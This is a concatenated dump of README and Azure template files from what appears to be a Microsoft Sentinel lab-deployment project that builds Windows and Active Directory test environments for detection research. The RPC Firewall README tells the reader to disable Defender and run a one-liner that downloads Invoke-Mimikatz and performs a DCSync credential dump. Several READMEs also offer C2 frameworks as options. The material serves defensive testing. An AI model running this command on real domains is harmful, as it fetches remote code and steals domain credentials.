Therefore, you can simply use the parsers available under **Functions** > **Workspace functions**: 78 | 79 | ``` 80 | VimProcessCreateLinuxSysmon 81 | | limit 10 82 | ``` 83 | 84 | ![](../../../../resources/images/linux-sysmon-azure-sentinel.png) 85 | -------------------------------------------------------------------------------- /grocery-list/Win10-AD-ADFS/README.md: -------------------------------------------------------------------------------- 1 | # Windows 10 + Windows Server (Active Directory) + Windows Server (Active Directory Federation Services) 2 | 3 | [![Deploy to Azure](https://aka.ms/deploytoazurebutton)](https://portal.azure.com/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FMicrosoft-Sentinel2Go%2Fmaster%2Fgrocery-list%2FWin10-AD-ADFS%2Fazuredeploy.json) 4 | [![Deploy to Azure Gov](https://aka.ms/deploytoazuregovbutton)](https://portal.azure.us/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FMicrosoft-Sentinel2Go%2Fmaster%2Fgrocery-list%2FWin10-AD-ADFS%2Fazuredeploy.json) 5 | 6 | ## Grocery Items 7 | 8 | * Microsoft Sentinel 9 | * Would you like to Bring-Your-Own Microsoft Sentinel?. 10 | * If so, set the `workspaceId` and `workspaceKey` parameters of your own workspace. 11 | * [Windows Security Events via AMA](https://docs.microsoft.com/en-us/azure/sentinel/data-connectors-reference#windows-security-events-via-ama) data connector enabled. 12 | * [Windows Forwarded Events](https://learn.microsoft.com/en-us/azure/sentinel/data-connectors/windows-forwarded-events) data connector enabled. 13 | * [Data collection rules (DCR)](https://docs.microsoft.com/en-us/azure/templates/microsoft.insights/datacollectionrules?tabs=json) to collect Windows Security events. 
14 | * Windows event channels enabled 15 | * `System` 16 | * `Microsoft-Windows-Sysmon/Operational` 17 | * `Directory Service` 18 | * `Windows PowerShell` 19 | * `Microsoft-Windows-PowerShell/Operational` 20 | * `AD FS/Admin` 21 | * One Windows Active Directory domain (One Domain Controller) 22 | * [Data Collection Rule (DCR) association](https://docs.microsoft.com/en-us/azure/azure-monitor/agents/data-collection-rule-azure-monitor-agent#data-collection-rule-associations) 23 | * Windows [Azure Monitoring Agent](https://docs.microsoft.com/en-us/azure/azure-monitor/agents/azure-monitor-agent-overview?tabs=PowerShellWindows) installed. It connects to the Microsoft Sentinel Log Analytics workspace defined in the template. 24 | * Active Directory Certificate Services (AD CS) Certification Authority (CA) role service enabled 25 | * Enterprise Root Certificate Authority created 26 | * ADFS Site Certificate created 27 | * ADFS Signing Certificate created 28 | * ADFS Decryption Certificate created 29 | * SMB share C:\Setup created to distribute ADFS certificates (.CER & .PFX files) 30 | * Full Access: Domain Admins & Domain Computers 31 | * Read Access: Authenticated Users 32 | * ADFS service account created 33 | * Azure Active Directory (AAD) Connect installed 34 | * One Windows Active Directory Federation Services (ADFS) server 35 | * [Data Collection Rule (DCR) association](https://docs.microsoft.com/en-us/azure/azure-monitor/agents/data-collection-rule-azure-monitor-agent#data-collection-rule-associations) 36 | * Windows [Azure Monitoring Agent](https://docs.microsoft.com/en-us/azure/azure-monitor/agents/azure-monitor-agent-overview?tabs=PowerShellWindows) installed. It connects to the Microsoft Sentinel Log Analytics workspace defined in the template. 
37 | * Active Directory Federation Services Role Service enabled 38 | * ADFS .pfx certificate retrieved from DC C:\Setup share 39 | * ADFS farm installed 40 | * Idp-Initiated Sign On page enabled 41 | * ADFS WebContent customized (Title, Web Theme, SignIn description) 42 | * ADFS Logging (SuccessAudits & FailureAudits) enabled 43 | * ADFS Auditing 44 | * Level: Verbose 45 | * Auditpol command: auditpol.exe /set /subcategory:"Application Generated" /failure:enable /success:enable 46 | * Azure Active Directory (AAD) Connect installed 47 | * Windows 10 Workstations (Max. 10) 48 | * [Data Collection Rule (DCR) association](https://docs.microsoft.com/en-us/azure/azure-monitor/agents/data-collection-rule-azure-monitor-agent#data-collection-rule-associations) 49 | * Windows [Azure Monitoring Agent](https://docs.microsoft.com/en-us/azure/azure-monitor/agents/azure-monitor-agent-overview?tabs=PowerShellWindows) installed. It connects to the Microsoft Sentinel Log Analytics workspace defined in the template. 50 | * [OPTIONAL] Sysmon 51 | * [Sysmon Config](https://github.com/OTRF/Blacksmith/blob/master/resources/configs/sysmon/sysmon.xml) 52 | * [ASIM Sysmon Windows parser](https://raw.githubusercontent.com/Azure/Azure-Sentinel/master/Parsers/ASim%20Sysmon%20for%20Windows/SysmonFullDeployment.json) 53 | * [OPTIONAL] Command and Control (c2) options: 54 | * `empire` 55 | * `covenant` 56 | * `metasploit` 57 | * Remote Access Restrictions (`AllowPublicIP` default option) 58 | * Access via Azure Bastion (Recommended. 
Additional costs applied) 59 | * Restrict Access to one Public IP Address (For example, Home Public IP Address) -------------------------------------------------------------------------------- /grocery-list/Win10-AD-WEC/README.md: -------------------------------------------------------------------------------- 1 | # Windows 10 + Windows Server (Domain Controller - Active Directory) + Windows Event Collector (WEC) 2 | 3 | [![Deploy to Azure](https://aka.ms/deploytoazurebutton)](https://portal.azure.com/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FMicrosoft-Sentinel2Go%2Fmaster%2Fgrocery-list%2FWin10-AD-WEC%2Fazuredeploy.json) 4 | [![Deploy to Azure Gov](https://aka.ms/deploytoazuregovbutton)](https://portal.azure.us/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FMicrosoft-Sentinel2Go%2Fmaster%2Fgrocery-list%2FWin10-AD-WEC%2Fazuredeploy.json) 5 | 6 | ## Grocery Items 7 | 8 | * Microsoft Sentinel 9 | * Would you like to Bring-Your-Own Microsoft Sentinel?. 10 | * If so, set the `workspaceId` and `workspaceKey` parameters of your own workspace. 11 | * [Windows Security Events via AMA](https://docs.microsoft.com/en-us/azure/sentinel/data-connectors-reference#windows-security-events-via-ama) data connector enabled. 12 | * [Data collection rule (DCR)](https://docs.microsoft.com/en-us/azure/templates/microsoft.insights/datacollectionrules?tabs=json) to collect Windows Security events. 13 | * [ASIM Windows parser](https://raw.githubusercontent.com/Azure/Azure-Sentinel/master/Parsers/ASim%20WindowsEvent/ARM/MicrosoftWindowsEventFullDeployment.json). 
14 | * One Windows Active Directory domain (One Domain Controller) 15 | * [Data Collection Rule (DCR) association](https://docs.microsoft.com/en-us/azure/azure-monitor/agents/data-collection-rule-azure-monitor-agent#data-collection-rule-associations) 16 | * [Windows Event Forwarding (WEF) client configured](https://github.com/OTRF/Blacksmith/blob/master/resources/scripts/powershell/auditing/Configure-WEF-Client.ps1). 17 | * One Windows Event Collector (WEC) 18 | * Windows [Azure Monitoring Agent](https://docs.microsoft.com/en-us/azure/azure-monitor/agents/azure-monitor-agent-overview?tabs=PowerShellWindows) installed. It connects to the Microsoft Sentinel Log Analytics workspace defined in the template. 19 | * [Data Collection Rule (DCR) association](https://docs.microsoft.com/en-us/azure/azure-monitor/agents/data-collection-rule-azure-monitor-agent#data-collection-rule-associations) 20 | * [WEC configured](https://github.com/OTRF/Blacksmith/blob/master/resources/scripts/powershell/auditing/Configure-WEC.ps1). 21 | * [Windows event subscriptions](https://github.com/OTRF/Blacksmith/tree/master/resources/configs/wef/subscriptions) deployed. 22 | * Windows [Azure Monitoring Agent](https://docs.microsoft.com/en-us/azure/azure-monitor/agents/azure-monitor-agent-overview?tabs=PowerShellWindows) installed. It connects to the Microsoft Sentinel Log Analytics workspace defined in the template. 23 | * Windows 10 Workstations (Max. 10) 24 | * [Data Collection Rule (DCR) association](https://docs.microsoft.com/en-us/azure/azure-monitor/agents/data-collection-rule-azure-monitor-agent#data-collection-rule-associations) 25 | * [Windows Event Forwarding (WEF) client configured](https://github.com/OTRF/Blacksmith/blob/master/resources/scripts/powershell/auditing/Configure-WEF-Client.ps1). 
26 | * [OPTIONAL] Sysmon 27 | * [Sysmon Config](https://github.com/OTRF/Blacksmith/blob/master/resources/configs/sysmon/sysmon.xml) 28 | * [ASIM Sysmon Windows parser](https://raw.githubusercontent.com/Azure/Azure-Sentinel/master/Parsers/ASim%20Sysmon%20for%20Windows/SysmonFullDeployment.json). 29 | * [OPTIONAL] Command and Control (c2) options: 30 | * `empire` 31 | * `covenant` 32 | * `metasploit` 33 | * Remote Access Restrictions (`AllowPublicIP` default option) 34 | * Access via Azure Bastion (Recommended. Additional costs applied) 35 | * Restrict Access to one Public IP Address (For example, Home Public IP Address) -------------------------------------------------------------------------------- /grocery-list/Win10-AD/README.md: -------------------------------------------------------------------------------- 1 | # Windows 10 + Windows Server (Domain Controller - Active Directory) 2 | 3 | [![Deploy to Azure](https://aka.ms/deploytoazurebutton)](https://portal.azure.com/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FMicrosoft-Sentinel2Go%2Fmaster%2Fgrocery-list%2FWin10-AD%2Fazuredeploy.json) 4 | [![Deploy to Azure Gov](https://aka.ms/deploytoazuregovbutton)](https://portal.azure.us/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FMicrosoft-Sentinel2Go%2Fmaster%2Fgrocery-list%2FWin10-AD%2Fazuredeploy.json) 5 | 6 | ## Grocery Items 7 | 8 | * Microsoft Sentinel 9 | * Would you like to Bring-Your-Own Microsoft Sentinel?. 10 | * If so, set the `workspaceId` and `workspaceKey` parameters of your own workspace. 11 | * [Windows Security Events via AMA](https://docs.microsoft.com/en-us/azure/sentinel/data-connectors-reference#windows-security-events-via-ama) data connector enabled. 12 | * [Windows Forwarded Events](https://learn.microsoft.com/en-us/azure/sentinel/data-connectors/windows-forwarded-events) data connector enabled. 
13 | * [Data collection rules (DCR)](https://docs.microsoft.com/en-us/azure/templates/microsoft.insights/datacollectionrules?tabs=json) to collect Windows Security events. 14 | * Windows event channels enabled 15 | * `System` 16 | * `Microsoft-Windows-Sysmon/Operational` 17 | * `Microsoft-Windows-TerminalServices-RemoteConnectionManager/Operational` 18 | * `Microsoft-Windows-Bits-Client/Operational` 19 | * `Microsoft-Windows-TerminalServices-LocalSessionManager/Operational` 20 | * `Directory Service` 21 | * `Microsoft-Windows-DNS-Client/Operational` 22 | * `Microsoft-Windows-Windows Firewall With Advanced Security/Firewall` 23 | * `Windows PowerShell` 24 | * `Microsoft-Windows-PowerShell/Operational` 25 | * `Microsoft-Windows-WMI-Activity/Operational` 26 | * One Windows Active Directory domain (One Domain Controller) 27 | * [Data Collection Rule (DCR) association](https://docs.microsoft.com/en-us/azure/azure-monitor/agents/data-collection-rule-azure-monitor-agent#data-collection-rule-associations) 28 | * Windows [Azure Monitoring Agent](https://docs.microsoft.com/en-us/azure/azure-monitor/agents/azure-monitor-agent-overview?tabs=PowerShellWindows) installed. It connects to the Microsoft Sentinel Log Analytics workspace defined in the template. 29 | * Windows 10 Workstations (Max. 10) 30 | * [Data Collection Rule (DCR) association](https://docs.microsoft.com/en-us/azure/azure-monitor/agents/data-collection-rule-azure-monitor-agent#data-collection-rule-associations) 31 | * Windows [Azure Monitoring Agent](https://docs.microsoft.com/en-us/azure/azure-monitor/agents/azure-monitor-agent-overview?tabs=PowerShellWindows) installed. It connects to the Microsoft Sentinel Log Analytics workspace defined in the template. 
32 | * [OPTIONAL] Sysmon 33 | * [Sysmon Config](https://github.com/OTRF/Blacksmith/blob/master/resources/configs/sysmon/sysmon.xml) 34 | * [ASIM Sysmon Windows parser](https://raw.githubusercontent.com/Azure/Azure-Sentinel/master/Parsers/ASim%20Sysmon%20for%20Windows/SysmonFullDeployment.json) 35 | * [OPTIONAL] Command and Control (c2) options: 36 | * `empire` 37 | * `covenant` 38 | * `metasploit` 39 | * Remote Access Restrictions (`AllowPublicIP` default option) 40 | * Access via Azure Bastion (Recommended. Additional costs applied) 41 | * Restrict Access to one Public IP Address (For example, Home Public IP Address) 42 | -------------------------------------------------------------------------------- /grocery-list/Win10-LDAPFW/README.md: -------------------------------------------------------------------------------- 1 | # Windows 10 + Domain Controller (Active Directory) + LDAP Firewall (LDAPFW) Project 2 | 3 | [![Deploy to Azure](https://aka.ms/deploytoazurebutton)](https://portal.azure.com/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FMicrosoft-Sentinel2Go%2Fmaster%2Fgrocery-list%2FWin10-LDAPFW%2Fazuredeploy.json) 4 | [![Deploy to Azure Gov](https://aka.ms/deploytoazuregovbutton)](https://portal.azure.us/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FMicrosoft-Sentinel2Go%2Fmaster%2Fgrocery-list%2FWin10-LDAPFW%2Fazuredeploy.json) 5 | 6 | ## Grocery Items 7 | 8 | * Microsoft Sentinel 9 | * Would you like to Bring-Your-Own Microsoft Sentinel?. 10 | * If so, set the `workspaceId` and `workspaceKey` parameters of your own workspace. 11 | * [Windows Forwarded Events](https://learn.microsoft.com/en-us/azure/sentinel/data-connectors/windows-forwarded-events) data connector enabled. 12 | * [Data collection rule (DCR)](https://docs.microsoft.com/en-us/azure/templates/microsoft.insights/datacollectionrules?tabs=json) to collect LDAP Firewall events. 
13 | * One Windows Active Directory domain (One Domain Controller) 14 | * [Data Collection Rule (DCR) association](https://docs.microsoft.com/en-us/azure/azure-monitor/agents/data-collection-rule-azure-monitor-agent#data-collection-rule-associations) 15 | * Windows [Azure Monitoring Agent](https://docs.microsoft.com/en-us/azure/azure-monitor/agents/azure-monitor-agent-overview?tabs=PowerShellWindows) installed. It connects to the Microsoft Sentinel Log Analytics workspace defined in the template. 16 | * [LDAP Firewall](https://github.com/zeronetworks/ldapfw) installed. 17 | * [OPTIONAL] Command and Control (c2) options: 18 | * `empire` 19 | * `metasploit` 20 | * Remote Access Restrictions (`AllowPublicIP` default option) 21 | * Access via Azure Bastion (Recommended. Additional costs applied) 22 | * Restrict Access to one Public IP Address (For example, Home Public IP Address) 23 | 24 | ## Validate Event Generation 25 | 26 | 1. RDP to DC01 27 | 2. Open Event Viewer and go to `Applications and Services Logs` > `LDAPFW` 28 | 29 | ![](../../resources/images/win10-ldapfw_check_events.png) 30 | 31 | ## Query Events in Microsoft Sentinel 32 | 33 | 1. Go to [https://portal.azure.com/](https://portal.azure.com/) and search for `Microsoft Sentinel`. 34 | 2. Go to `logs` 35 | 3. Query the `WindowsEvent` table and filter events on the `LDAPFW` channel. 36 | 37 | ![](../../resources/images/win10-ldapfw_query_ldap_firewall.png) 38 | -------------------------------------------------------------------------------- /grocery-list/Win10-LDAPFW/linkedtemplates/customScriptExtension.json: -------------------------------------------------------------------------------- 1 | { 2 | "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", 3 | "contentVersion": "1.0.0.0", 4 | "parameters": { 5 | "virtualMachines": { 6 | "type": "array", 7 | "metadata": { 8 | "description": "List of endpoints to run a script. 
The format is an array of endpoints with a property/attribute named 'vmName'" 9 | } 10 | }, 11 | "fileUris": { 12 | "type": "array" 13 | }, 14 | "commandToExecute": { 15 | "type": "string" 16 | }, 17 | "location": { 18 | "type": "string", 19 | "metadata": { 20 | "description": "Location for all resources." 21 | } 22 | } 23 | }, 24 | "resources": [ 25 | { 26 | "type": "Microsoft.Compute/virtualMachines/extensions", 27 | "apiVersion": "2021-07-01", 28 | "name": "[concat(parameters('virtualMachines')[copyIndex('runScriptCopy')].vmName, '/', parameters('virtualMachines')[copyIndex('runScriptCopy')].extensionName)]", 29 | "location": "[parameters('location')]", 30 | "copy": { 31 | "name": "runScriptCopy", 32 | "count": "[length(parameters('virtualMachines'))]" 33 | }, 34 | "properties": { 35 | "publisher": "Microsoft.Compute", 36 | "type": "CustomScriptExtension", 37 | "typeHandlerVersion": "1.8", 38 | "autoUpgradeMinorVersion": true, 39 | "settings": { 40 | "fileUris": "[parameters('fileUris')]", 41 | "commandToExecute": "[parameters('commandToExecute')]" 42 | }, 43 | "protectedSettings": {} 44 | } 45 | } 46 | ] 47 | } 48 | -------------------------------------------------------------------------------- /grocery-list/Win10-PAN-FW/README.md: -------------------------------------------------------------------------------- 1 | # Microsoft Sentinel + Win10 + Palo Alto Networks VM-Series Firewall 2 | 3 | [![Deploy to Azure](https://aka.ms/deploytoazurebutton)](https://portal.azure.com/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FMicrosoft-Sentinel2Go%2Fmaster%2Fgrocery-list%2FWin10-PAN-FW%2Fazuredeploy.json) 4 | [![Deploy to Azure Gov](https://aka.ms/deploytoazuregovbutton)](https://portal.azure.us/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FMicrosoft-Sentinel2Go%2Fmaster%2Fgrocery-list%2FWin10-PAN-FW%2Fazuredeploy.json) 5 | 6 | ## Grocery Items 7 | 8 | * Microsoft Sentinel 9 | * Would you like to 
Bring-Your-Own Microsoft Sentinel? 10 | * If so, set the `workspaceId` and `workspaceKey` parameters of your own workspace. 11 | * [Windows Security Events via AMA](https://docs.microsoft.com/en-us/azure/sentinel/data-connectors-reference#windows-security-events-via-ama) data connector enabled. 12 | * [Data collection rule (DCR)](https://docs.microsoft.com/en-us/azure/templates/microsoft.insights/datacollectionrules?tabs=json) to collect Windows Security events. 13 | * [CEF Data Connector Enabled](https://docs.microsoft.com/en-us/azure/sentinel/connect-common-event-format). 14 | * [Palo Alto Networks Data Connector enabled](https://docs.microsoft.com/en-us/azure/sentinel/data-connectors-reference#palo-alto-networks). 15 | * One Ubuntu Server 16 | * CEF Collector Server (RSyslog) 17 | * Linux [Microsoft Monitoring Agent](https://docs.microsoft.com/en-us/services-hub/health/mma-setup) installed. 18 | * Palo Alto Networks VM-Series firewall 19 | * Bundle 2 Subscription: It includes the VM-Series capacity license with the complete suite of licenses that includes Threat Prevention, GlobalProtect, WildFire, PAN-DB URL Filtering, and a premium support entitlement. 20 | * Windows 10 Workstations (Max. 10) 21 | * [Data Collection Rule (DCR) association](https://docs.microsoft.com/en-us/azure/azure-monitor/agents/data-collection-rule-azure-monitor-agent#data-collection-rule-associations) 22 | * Windows [Azure Monitoring Agent](https://docs.microsoft.com/en-us/azure/azure-monitor/agents/azure-monitor-agent-overview?tabs=PowerShellWindows) installed. It connects to the Microsoft Sentinel Log Analytics workspace defined in the template. 
23 | * [OPTIONAL] Sysmon 24 | * [Sysmon Config](https://github.com/OTRF/Blacksmith/blob/master/resources/configs/sysmon/sysmon.xml) 25 | * [ASIM Sysmon Windows parser](https://raw.githubusercontent.com/Azure/Azure-Sentinel/master/Parsers/ASim%20Sysmon%20for%20Windows/SysmonFullDeployment.json) 26 | * [OPTIONAL] Command and Control (c2) options: 27 | * `empire` 28 | * `covenant` 29 | * `metasploit` 30 | * Remote Access Restrictions (`AllowPublicIP` default option) 31 | * Access via Azure Bastion (Recommended. Additional costs applied) 32 | * Restrict Access to one Public IP Address (For example, Home Public IP Address) 33 | 34 | ## VM-Series Licensing Process 35 | 36 | For both AWS and Microsoft Azure, the licensing options are bring your own license (BYOL) and pay as you go/consumption-based (PAYG) subscriptions. 37 | 38 | * **BYOL**: Any one of the VM-Series models, along with the associated Subscriptions and Support, are purchased via normal Palo Alto Networks channels and then deployed through your AWS or Azure management console. 39 | * **PAYG (Pay-as-you-go)**: Purchase the VM-Series and select Subscriptions and Premium Support as an hourly subscription bundle from the AWS Marketplace. 40 | * **Bundle 1 contents**: VM-300 firewall license, Threat Prevention Subscription (inclusive of IPS, AV, Malware prevention) and Premium Support. 41 | * **Bundle 2 contents**: VM-300 firewall license, Threat Prevention (inclusive of IPS, AV, Malware prevention), WildFire™ threat intelligence service, URL Filtering, GlobalProtect Subscriptions and Premium Support. 42 | 43 | ## Accept Azure VM Marketplace Terms (MUST DO) 44 | 45 | * The Palo Alto Networks (PAN) VM-Series Firewall is deployed from Azure Marketplace. You need to accept the legal terms to use the VM. 46 | * You must have authorization to perform action `Microsoft-MarketPlaceOrdering/offerTypes/publishers/offers/plans/agreements/write` over scope `subscription`. 
47 | * **Make sure you run the commands below before deploying this template** 48 | * You can do it locally via [Azure CLI](https://docs.microsoft.com/en-us/cli/azure/?view=azure-cli-latest) or via the [Azure Cloud Shell](https://shell.azure.com/). 49 | 50 | Look for the PAN VM-Series Firewall you are deploying: 51 | 52 | ``` 53 | az vm image list --all --publisher paloaltonetworks --offer vmseries1 --sku bundle2 --query '[0].urn' 54 | ``` 55 | 56 | Accept the terms for the URN returned by the previous command: 57 | 58 | ``` 59 | az vm image terms accept --urn paloaltonetworks:vmseries1:bundle2:7.1.1 60 | ``` 61 | -------------------------------------------------------------------------------- /grocery-list/Win10-RPCFW/README.md: -------------------------------------------------------------------------------- 1 | # Windows 10 + Domain Controller (Active Directory) + RPC Firewall (RPCFW) Project 2 | 3 | [![Deploy to Azure](https://aka.ms/deploytoazurebutton)](https://portal.azure.com/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FMicrosoft-Sentinel2Go%2Fmaster%2Fgrocery-list%2FWin10-RPCFW%2Fazuredeploy.json) 4 | [![Deploy to Azure Gov](https://aka.ms/deploytoazuregovbutton)](https://portal.azure.us/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FMicrosoft-Sentinel2Go%2Fmaster%2Fgrocery-list%2FWin10-RPCFW%2Fazuredeploy.json) 5 | 6 | ## Grocery Items 7 | 8 | * Microsoft Sentinel 9 | * Would you like to Bring-Your-Own Microsoft Sentinel? 10 | * If so, set the `workspaceId` and `workspaceKey` parameters of your own workspace. 11 | * [Windows Forwarded Events](https://learn.microsoft.com/en-us/azure/sentinel/data-connectors/windows-forwarded-events) data connector enabled. 12 | * [Data collection rule (DCR)](https://docs.microsoft.com/en-us/azure/templates/microsoft.insights/datacollectionrules?tabs=json) to collect RPC Firewall events. 
13 | * [Windows RPC Firewall parser](https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/master/microsoft-sentinel/linkedtemplates/parsers/winRPCFWLogs.json). 14 | * One Windows Active Directory domain (One Domain Controller) 15 | * [Data Collection Rule (DCR) association](https://docs.microsoft.com/en-us/azure/azure-monitor/agents/data-collection-rule-azure-monitor-agent#data-collection-rule-associations) 16 | * [RPC Firewall](https://github.com/zeronetworks/rpcfirewall) installed. 17 | * [RPC Firewall config](https://github.com/OTRF/Blacksmith/blob/master/resources/configs/rpcfirewall/RpcFw.conf) used. 18 | * Windows 10 Workstations (Max. 10) 19 | * [Data Collection Rule (DCR) association](https://docs.microsoft.com/en-us/azure/azure-monitor/agents/data-collection-rule-azure-monitor-agent#data-collection-rule-associations) 20 | * [RPC Firewall](https://github.com/zeronetworks/rpcfirewall) installed. 21 | * [RPC Firewall config](https://github.com/OTRF/Blacksmith/blob/master/resources/configs/rpcfirewall/RpcFw.conf) used. 22 | * [OPTIONAL] Command and Control (c2) options: 23 | * `empire` 24 | * `metasploit` 25 | * Remote Access Restrictions (`AllowPublicIP` default option) 26 | * Access via Azure Bastion (Recommended. Additional costs applied) 27 | * Restrict Access to one Public IP Address (For example, Home Public IP Address) 28 | 29 | ## Validate Event Generation 30 | 31 | 1. RDP to DC01 32 | 2. Open Event Viewer and go to `Applications and Services Logs` > `RPCFWP` 33 | 34 | ![](../../resources/images/win10-rpcfw_check_events.png) 35 | 36 | ## Validate RPC Firewall Capabilities 37 | ### Monitor Directory Replication Service (DRS) RPC Calls 38 | 39 | 1. Validate that the domain controller contains the `RpcFw.conf` file in the `C:\ProgramData\` folder. 40 | 2. Validate that the following entry exists in the config file: 41 | 42 | ``` 43 | fw:uuid:e3514235-4b06-11d1-ab04-00c04fc2dcd2 action:allow audit:true verbose:true 44 | ``` 45 | 46 | 3. 
If you update the configuration, make sure you run the following command: 47 | 48 | ```PowerShell 49 | .\RpcFwManager.exe /update 50 | ``` 51 | 52 | 4. Disable Defender 53 | 5. Open PowerShell as an Administrator and run the following commands: 54 | 55 | ```PowerShell 56 | IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/BC-SECURITY/Empire/master/empire/server/data/module_source/credentials/Invoke-Mimikatz.ps1"); Invoke-Mimikatz -Command privilege::debug; Invoke-Mimikatz -Command '"lsadump::dcsync /domain:mssentinel.local /user:mssentinel\pgustavo" "exit"' 57 | ``` 58 | 59 | 6. Open Event Viewer and go to `Applications and Services Logs` > `RPCFWP` 60 | 61 | ![](../../resources/images/win10-rpcfw_mk_dcsync.png) 62 | 63 | ### Block Directory Replication Service (DRS) RPC Calls 64 | 65 | 1. Validate that the domain controller contains the `RpcFw.conf` file in the `C:\ProgramData\` folder. 66 | 2. Validate that the following entry exists in the config file: 67 | 68 | ``` 69 | fw:uuid:e3514235-4b06-11d1-ab04-00c04fc2dcd2 addr:127.0.0.1 action:allow 70 | fw:uuid:e3514235-4b06-11d1-ab04-00c04fc2dcd2 action:block audit:true verbose:true 71 | ``` 72 | 73 | 3. If you update the configuration, make sure you run the following command: 74 | 75 | ```PowerShell 76 | .\RpcFwManager.exe /update 77 | ``` 78 | 79 | 4. Disable Defender 80 | 5. Open PowerShell as an Administrator and run the following commands: 81 | 82 | ```PowerShell 83 | IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/BC-SECURITY/Empire/master/empire/server/data/module_source/credentials/Invoke-Mimikatz.ps1"); Invoke-Mimikatz -Command privilege::debug; Invoke-Mimikatz -Command '"lsadump::dcsync /domain:mssentinel.local /user:mssentinel\pgustavo" "exit"' 84 | ``` 85 | 4. 
Open Event Viewer and go to `Applications and Services Logs` > `RPCFWP` 86 | 87 | ![](../../resources/images/win10-rpcfw_block_replication_event.png) 88 | 89 | ## Query Events in Microsoft Sentinel 90 | 91 | 1. Go to [https://portal.azure.com/](https://portal.azure.com/) and search for "Microsoft Sentinel". 92 | 2. Go to `logs` 93 | 3. There will be a function / parser already available for you to query RPC Firewall events: 94 | 95 | ![](../../resources/images/win10-rpcfw_query_rpcfirewall_limit10.png) 96 | 97 | 4. Run a basic query to find the use of Directory Replication Services (DRS) in your environment: 98 | 99 | ![](../../resources/images/win10-rpcfw_query_rpcfirewall_where_replication.png) 100 | 101 | ## References: 102 | * https://github.com/Cyb3rWard0g/WinRpcFunctions 103 | * https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-drsr/06205d97-30da-4fdc-a276-3fd831b272e0 104 | * https://github.com/zeronetworks/rpcfirewall 105 | * https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-drsr/58f33216-d9f1-43bf-a183-87e3c899c410 -------------------------------------------------------------------------------- /grocery-list/Win10-RPCFW/linkedtemplates/customScriptExtension.json: -------------------------------------------------------------------------------- 1 | { 2 | "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", 3 | "contentVersion": "1.0.0.0", 4 | "parameters": { 5 | "virtualMachines": { 6 | "type": "array", 7 | "metadata": { 8 | "description": "List of endpoints to run a script. The format is an array of endpoints with a property/attribute named 'vmName'" 9 | } 10 | }, 11 | "fileUris": { 12 | "type": "array" 13 | }, 14 | "commandToExecute": { 15 | "type": "string" 16 | }, 17 | "location": { 18 | "type": "string", 19 | "metadata": { 20 | "description": "Location for all resources." 
21 | } 22 | } 23 | }, 24 | "resources": [ 25 | { 26 | "type": "Microsoft.Compute/virtualMachines/extensions", 27 | "apiVersion": "2021-07-01", 28 | "name": "[concat(parameters('virtualMachines')[copyIndex('runScriptCopy')].vmName, '/', parameters('virtualMachines')[copyIndex('runScriptCopy')].extensionName)]", 29 | "location": "[parameters('location')]", 30 | "copy": { 31 | "name": "runScriptCopy", 32 | "count": "[length(parameters('virtualMachines'))]" 33 | }, 34 | "properties": { 35 | "publisher": "Microsoft.Compute", 36 | "type": "CustomScriptExtension", 37 | "typeHandlerVersion": "1.8", 38 | "autoUpgradeMinorVersion": true, 39 | "settings": { 40 | "fileUris": "[parameters('fileUris')]", 41 | "commandToExecute": "[parameters('commandToExecute')]" 42 | }, 43 | "protectedSettings": {} 44 | } 45 | } 46 | ] 47 | } 48 | -------------------------------------------------------------------------------- /grocery-list/Win10/README.md: -------------------------------------------------------------------------------- 1 | # Microsoft Sentinel + Windows 10 Workstations 2 | 3 | [![Deploy to Azure](https://aka.ms/deploytoazurebutton)](https://portal.azure.com/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FMicrosoft-Sentinel2Go%2Fmaster%2Fgrocery-list%2FWin10%2Fazuredeploy.json) 4 | [![Deploy to Azure Gov](https://aka.ms/deploytoazuregovbutton)](https://portal.azure.us/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FMicrosoft-Sentinel2Go%2Fmaster%2Fgrocery-list%2FWin10%2Fazuredeploy.json) 5 | 6 | ## Grocery Items 7 | 8 | * Microsoft Sentinel 9 | * Would you like to Bring-Your-Own Microsoft Sentinel?. 10 | * If so, set the `workspaceId` and `workspaceKey` parameters of your own workspace. 11 | * [Windows Security Events via AMA](https://docs.microsoft.com/en-us/azure/sentinel/data-connectors-reference#windows-security-events-via-ama) data connector enabled. 
